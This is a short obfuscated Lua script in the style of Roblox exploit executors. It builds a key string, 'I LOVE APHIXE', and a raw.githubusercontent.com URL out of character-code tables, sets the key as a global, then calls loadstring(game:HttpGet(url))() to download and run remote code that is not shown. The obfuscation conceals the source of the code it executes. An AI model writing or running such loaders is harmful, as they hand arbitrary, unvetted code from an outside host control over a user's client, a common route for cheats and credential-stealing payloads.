local function a1b2c3()
    local d4e5f6 = {73, 32, 76, 79, 86, 69}
    local g7h8i9 = ""
    for _, j1k2l3 in ipairs(d4e5f6) do
        g7h8i9 = g7h8i9 .. string.char(j1k2l3)
    end
    return g7h8i9
end

local function m1n2o3()
    local p4q5r6 = {65, 80, 72, 73, 88, 69}
    local s7t8u9 = ""
    for _, v1w2x3 in ipairs(p4q5r6) do
        s7t8u9 = s7t8u9 .. string.char(v1w2x3)
    end
    return s7t8u9
end

local a1b2c3d4 = a1b2c3()
local e5f6g7h8 = m1n2o3()

local i9j0k1l2 = string.upper(a1b2c3d4 .. " " .. e5f6g7h8)

local function z3x4y5()
    local a = table.concat({
        string.char(104, 116, 116, 112, 115), "://", 
        "raw", ".", "githubusercontent", ".", "com"
    })
    
    local b = table.concat({
        string.char(117, 117, 106, 120, 85, 106, 105, 111) 
    }) .. "/"
    
    local c = "uquewqwqewi/"
    
    local d = "main/"
    
    local e = table.concat({
        string.char(108, 107, 101, 119, 113, 117, 105, 101, 121, 119, 117, 101, 111, 113, 119) 
    })

    local f = {a .. "/" .. b .. c .. d .. e}

    for _, g in f do
        return g
    end
end


local h = z3x4y5()
_G.Key = {z8b9c3 = i9j0k1l2}

loadstring(game:HttpGet(h))()

